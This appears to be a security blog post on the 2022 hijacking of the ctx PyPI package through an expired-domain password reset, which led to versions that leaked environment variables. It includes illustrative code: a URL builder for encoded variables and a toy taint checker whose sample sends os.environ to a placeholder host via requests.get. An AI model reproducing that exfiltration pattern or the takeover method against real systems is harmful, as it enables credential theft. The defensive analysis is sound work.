Open source libraries lay the foundations for modern applications. Polluting these libraries creates opportunities to plant security backdoors at a massive scale. There have been several recent attempts to pollute open source repositories. Here is a story from last week.
In May 2022, a Reddit user posted that he had spotted a new update to the ctx library on PyPI. According to the GitHub repo, the library is a “minimal but opinionated dict/object combo (like Bunch)”. The ctx module provides the ctx class, which is a subclass of the Python ‘dict’ object. Like Bunch, the library allows dictionary lookups through attribute access notation. The library had last been updated in December 2014, yet several new versions of ctx had been uploaded within the previous few days.
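To make the "dict/object combo" idea concrete, here is a minimal sketch of a dict subclass with attribute access. It is not the ctx source code; the class name `AttrDict` and the sample keys are hypothetical and chosen only for illustration.

```python
class AttrDict(dict):
    """Hypothetical stand-in for a ctx-style class: dict keys double as attributes."""

    def __getattr__(self, name):
        # Only called when normal attribute lookup fails,
        # so built-in dict methods such as .items() keep working.
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name) from None

    def __setattr__(self, name, value):
        # Attribute assignment stores the value as a dictionary entry.
        self[name] = value


config = AttrDict(host="localhost", port=8080)
config.debug = True          # same effect as config["debug"] = True
print(config.host, config["port"], config.debug)
```

Because the object is still a regular dict, it can be passed to any code that expects a dictionary, which is what makes such helper libraries attractive and widely installed.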
The original author’s GitHub repo for ctx showed that no such updates had been made. The package versions also looked suspicious. One was v0.1.2, the same version number as the release that had been there since 2014. Then there were two more updates, one with version number 0.2.2 and another with version number 0.2.6. The version numbering appeared to be arbitrary and inconsistent.
What happened was a simple social engineering attack. The perpetrator noticed that the original maintainer’s domain name had expired, so he registered the domain name on May 14, 2022. He then created an email address on that domain and used it to trigger a password reset for the maintainer’s account. This was trivial. At that point, the perpetrator could publish the new package versions on PyPI under the maintainer’s name.
The new package had a few lines of code that were suspicious. Here is the listing.
The code packs all of the environment variables into a string, encodes it, and forwards the encoded string in a GET request to a malicious website.
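The pack, encode, and forward pattern described above can be illustrated harmlessly. The sketch below is not the attacker's code: it uses fake variables instead of the real environment, assumes base64 as the encoding, points at a placeholder `collector.invalid` host, and never opens a network connection. The function name `build_exfil_url` and the `data` parameter are hypothetical.

```python
import base64
from urllib.parse import urlencode


def build_exfil_url(variables, endpoint="https://collector.invalid/"):
    """Show what the URL of such a GET request could look like (nothing is sent)."""
    # Step 1: pack every key/value pair into a single string.
    packed = "\n".join(f"{key}={value}" for key, value in sorted(variables.items()))
    # Step 2: encode the string so it survives inside a URL (base64 is an assumption).
    encoded = base64.urlsafe_b64encode(packed.encode("utf-8")).decode("ascii")
    # Step 3: attach the encoded blob as a query parameter of a GET request.
    return endpoint + "?" + urlencode({"data": encoded})


# Fake data only; real malware would read os.environ here.
fake_env = {"AWS_SECRET_ACCESS_KEY": "not-a-real-key", "HOME": "/home/demo"}
url = build_exfil_url(fake_env)
print(url)
```

The point for a reviewer is that each step looks innocent in isolation; it is the flow from the environment to an outbound request that signals a leak.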
Popular Python bug detection tools were run on the above code to see whether they would detect its malicious intent. Two very popular tools reported zero errors on that code snippet. Screenshots from both are shown below.
Here is the dashboard of SonarQube showing that no bugs had been found.
Here is the dashboard of Codacy. Again, no bugs found.
OpenRefactory’s Intelligent Code Repair (iCR), however, identified that there is an opportunity to leak sensitive data. Here is the detected bug.
Note that iCR does not generate a fix in this case. The way to fix this is to sanitize the tainted data, but the sanitization process depends on domain knowledge that iCR does not have. Instead, iCR shows the trace of how the taint flowed from the source to the sensitive sink. This should equip a developer with sufficient information to decide where to sanitize the data and how to sanitize it effectively.
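The idea of a source-to-sink taint trace can be sketched with Python's standard `ast` module. This is a toy illustration, not how iCR works: it only follows simple variable assignments in source order, and the `SOURCES` and `SINKS` sets, the sample snippet, and the `collector.invalid` host are all assumptions made for the example.

```python
import ast

SOURCES = {"os.environ"}                              # assumed taint sources
SINKS = {"requests.get", "urllib.request.urlopen"}    # assumed sensitive sinks


def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def taint_origin(expr, tainted):
    """Return the trace behind the first tainted sub-expression found, or None."""
    for sub in ast.walk(expr):
        name = dotted_name(sub)
        if name in SOURCES:
            return [f"line {sub.lineno}: source {name}"]
        if isinstance(sub, ast.Name) and sub.id in tainted:
            return tainted[sub.id]
    return None


def find_leaks(source_code):
    """Return one trace (a list of steps) per tainted value that reaches a sink."""
    tree = ast.parse(source_code)
    nodes = [n for n in ast.walk(tree) if isinstance(n, (ast.Assign, ast.Call))]
    nodes.sort(key=lambda n: (n.lineno, n.col_offset))   # approximate source order
    tainted, leaks = {}, []
    for node in nodes:
        if isinstance(node, ast.Assign):
            origin = taint_origin(node.value, tainted)
            for target in node.targets:
                if not isinstance(target, ast.Name):
                    continue
                if origin:
                    step = f"line {node.lineno}: flows into {target.id}"
                    tainted[target.id] = origin + [step]
                else:
                    tainted.pop(target.id, None)         # overwritten with clean data
        elif dotted_name(node.func) in SINKS:
            for arg in list(node.args) + [kw.value for kw in node.keywords]:
                origin = taint_origin(arg, tainted)
                if origin:
                    sink = dotted_name(node.func)
                    leaks.append(origin + [f"line {node.lineno}: reaches sink {sink}"])
                    break
    return leaks


# The sample is only parsed, never executed.
SAMPLE = '''\
import os
import requests

secrets = str(dict(os.environ))
url = "https://collector.invalid/?q=" + secrets
requests.get(url)
'''

for trace in find_leaks(SAMPLE):
    print("\n".join(trace))
```

A production analyzer would also have to handle function calls, object attributes, branches, and aliasing, but even this small version shows why a trace is useful: each step names the line where the developer could choose to sanitize or block the data.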
In this case, though, the malicious code was introduced deliberately, so there was nothing to fix. Because such repository poisoning attacks are becoming more and more common, it is imperative that hubs such as PyPI scan for malicious content before publishing code. SAST tools, too, should step up and be able to flag the problem in the first place.
Here is a short video that demonstrates the experiment.
- The PyPI administrators estimate that about 27,000 malicious copies of ctx were downloaded from the registry.
- The person behind the hack has spoken out. He mentioned that he also compromised the PHPPass package. He received 1000 environment variables, but he insisted that he did all of this to prove a point and that there had been no malicious intent behind it. All the details are here.
- The ctx package is not available from PyPI.
- The package is available from GitHub, though, after having been temporarily taken down for a few days.